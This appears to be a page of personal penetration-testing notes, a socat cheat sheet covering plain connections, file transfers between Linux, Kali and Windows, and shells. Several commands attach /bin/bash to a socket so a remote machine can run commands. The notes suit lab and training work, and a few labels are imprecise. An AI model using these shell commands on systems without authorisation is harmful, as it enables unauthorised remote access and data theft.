> For the complete documentation index, see [llms.txt](https://davidtancredi.gitbook.io/pentesting-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/tools/socat.md).

# Socat

**#Normal connection&#x20;**<mark style="color:red;">**Linux**</mark>**&#x20;←→&#x20;**<mark style="color:red;">**linux**</mark>**:**

Listener: `socat TCP4-LISTEN:1234 STDOUT`

Connection: `socat STDIN TCP4:10.10.10.10:1234`

**#Reverse shell (**<mark style="color:red;">**Linux**</mark>**&#x20;←→&#x20;**<mark style="color:red;">**linux**</mark>**)**

Listening IP 10.10.10.10

`socat TCP4-LISTEN:1234 EXEC:/bin/bash`

Connecting

`socat STDIN TCP4:10.10.10.10:1234`

ls Desktop Downloads…..

**#File Tansfers&#x20;**<mark style="color:red;">**Linux**</mark>**&#x20;-->**<mark style="color:red;">**Linux**</mark>

Sender

`socat FILE:./file.txt TCP4-LISTEN:1234`

Receiver

`socat – TCP4:10.10.10.10:1234 > file2.txt` (important to rename file differently)

**#File transfers&#x20;**<mark style="color:red;">**Linux**</mark>**&#x20;→&#x20;**<mark style="color:blue;">**Windows**</mark>

<mark style="color:red;">Linux</mark> (IP 10.10.10.10 port 443)

`socat TCP4-LISTEN:443, fork file:file.txt`

<mark style="color:blue;">Windows</mark>

`socat TCP4:10.10.10.10:443 file:file2.txt,create` (important to rename incoming file)

OR:

Kali: `sudo socat TCP4-LISTEN:443,fork file:file.txt`

Linux : `socat TCP4:127.0.0.1:443 file:file2.txt,create`

**#Socat Reverse shell (Windows to kali, Execute commands from Win ---> kali)**

Windows : (Windows client IP 10.11.0.22)

socat -d -d TCP4-LISTEN:443 STDOUT

Kali socat TCP4:10.11.0.22:443 EXEC:/bin/bash 

Once executed Windows machine can run commands on Kali
